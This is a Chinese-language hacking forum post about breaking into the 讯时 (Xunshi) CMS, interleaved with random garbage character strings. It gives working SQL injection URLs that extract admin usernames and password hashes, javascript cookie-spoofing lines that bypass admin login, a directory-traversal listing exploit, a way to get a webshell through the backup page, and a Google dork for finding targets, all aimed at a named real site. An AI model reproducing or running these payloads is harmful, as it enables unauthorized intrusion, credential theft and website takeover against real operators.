讯时漏洞总结

admin

by:血封忆尘
& `9 U5 I  ]: p' X9 @: _5 C0 }% N. w0 _
/ J3 W- c3 j' a- \* u在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
& _" v9 E; A6 i4 F! |& p
以下本文总结来自黑防去年第9期杂志上的内容...
1 p$ R; O$ @9 ^
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
7 S. f  V- d. C4 G9 D
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& u, n3 [" R1 r- _' E1 }5 p
1 ?! b: R- \! g' l2 p- u. C7 }记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入

; N+ |# y3 a6 s  r$ I6 H% w效果如图:


9 I; f, Z' M" Q
! r: \& d7 n* Z4 ?5 z% R' v. V这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

6 n6 }% l; O6 |- G8 U6 V, G) q密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
1 |; F1 z5 b; e
5 K$ Y6 r$ n2 e/ {javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

0 k, j8 j5 E% n" I& @* ]1 S% u那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
) l' H8 p+ j# O! Q9 Y0 |
& P% C; m- t; H0 J5 S0 T" \1 k因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

* \2 L. c4 D# R$ e它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
1 I; `- j- }  S7 x
访问这页面来列目录..步骤如下:
4 P4 t! l6 p, ^% j
3 t0 [& H' C- Y+ Q8 ?+ Ajavascript:alert(document.cookie="admindj=1")
& F, d& Y+ ~. B7 A0 ]9 c! f
http://www.political-security.co ... asp?id=46&dir=../..
9 c7 e- K: D. q) Z5 M
: r% t. B! [' t效果如图:
6 I* u! e  Y. R" \" U$ q# j
) S: E! P/ U. z7 j0 B# S
: ~( z( n4 m* k* l6 M. t8 Y9 j
这样全站目录都能瞧了..找到后台目录..进去..
! P% \8 B' W. w+ c0 H% }
那么进了后台怎么拿shell？？上传--备份就ok了..
1 |" K% @7 ?* G2 r! @
- Q) g: \$ [5 j7 q0 x  X那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

2 S& J6 F+ I  i0 o9 v这个我也碰到过一次..你都可以通过列目录来实现..
) X: \; ]% E1 ~
- ]' w$ M: B" ejavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... p?action=BackupData

' B. a8 r6 a% n2 B" \8 d备份ok..
' [- O- C& o9 ?4 i- j
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
- X' N! M! {9 h: h$ _( X4 X, V
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

然后访问此页面进行注入..步骤如下:
& W$ K% {+ U0 R* r
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面
- a" n; v% o9 q1 W' K( q6 a
! f4 _. L2 o$ Y7 b输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

( C! N: O5 q* g4 O$ o0 w26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

" q& D4 H; V7 |; L( y" ]2 E效果如图所示:
4 T; K  Y) I8 d9 c
$ W. @/ h( b- _4 J# ~, ?- F

讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
7 k: W2 z) u# B  Q$ o
* U6 e0 c2 X5 |. g6 b1、/admin/admin_news_pl_view.asp?id=1
7 n3 }6 a( ^) Z9 d//id任意 填入以下语句

+ _3 K+ s( k) P; |9 G: o$ ^- `2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
# J. Y) d  N, O, j* Z& e& G
; V' [- w! x! K. `+ O" p4 t5 J8 J$ V
  z( p2 e! f, [6 K; {' \
4 }7 D! N- r  X* W3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

7 ^) x1 |- e$ Z$ o- C6 q! V) Z
' |) ?6 S1 w$ l" m' @
7 Z" o6 R8 [, c# w爆出管理员帐号和密码了


- T) M. ]( [& y0 w, n6 L0 M  J
. g' R; Z( W& R4 n) e( m) e4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));


0 I, Z/ L, Z# G% T4 u
5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
8 F! B8 I& n: V9 n) w5 C
  q! i4 l3 R/ ?9 ?, {- o/ l5 b+ D

6、后台有上传和备份取SHELL不难。
  n  O& F3 q7 D8 e
7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
; A$ N$ m! q; H7 i0 K
, F# K0 A+ M2 j; }逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
& g0 \* K( g) q4 v; _4 ]
6 S) V) Q1 ], c- ?3 ]1 O

/ |& _# k! d8 O! |5 t, G1 Q